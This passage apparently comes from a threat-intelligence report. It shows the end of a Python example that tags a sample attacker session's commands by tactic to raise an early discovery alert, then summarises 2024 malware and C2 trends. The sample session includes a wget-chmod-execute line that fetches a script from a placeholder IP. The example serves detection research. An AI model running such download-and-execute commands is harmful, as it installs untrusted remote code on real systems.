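    "cd /tmp; wget http://203.0.113.7/PLACEHOLDER.sh; chmod +x PLACEHOLDER.sh; ./PLACEHOLDER.sh",
]

if __name__ == "__main__":
    print(tactic_distribution(SAMPLE_SESSION))
    print("discovery alert at command", discovery_alert_position(SAMPLE_SESSION))
```

On the constructed session the discovery threshold is crossed at the fifth command, seventeen commands before the first persistence action, which is the detection margin the insight above is about; rule order matters, since `crontab -l` (listing jobs) must be tagged as discovery before any persistence rule sees it.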


2.8. Malware – Botnets Again at the Top

Source: Forescout Research – Vedere Labs

Figure 8 – Distribution of observed malware samples and C2 servers

Figure 8 shows the distribution of malware and observed command and control (C2) servers in our dataset. In 2023, we saw a tie between remote access Trojans (RATs) and information stealers (infostealers) with botnets coming in third place. This year, we see botnets at the top, followed by infostealers and RATs. The 'Others' category includes keyloggers, cryptominers, ransomware, worms and other malicious software. Overall, this data does not show any big changes in the landscape of malware types.

This is different for individual malware families and C2s:

• 5 of the most popular malware families of 2024 were not in the 2023 list: Lumma, Gafgyt, Healer, CredentialFlusher, and Remcos. Mirai returned to the top as the most popular malware we observe, but Lumma (in second place) is the most popular new entry.

• 4 of the most popular C2 of 2024 were not in the 2023 list: Viper, DarkGate, Quasar, DcRAT. Although Cobalt Strike remains by far the most popular C2, the use of Viper has surged, surpassing even Sliver, which was gaining a lot of attention in 2023.


Fact: Although individual malware samples and families evolve every day, the
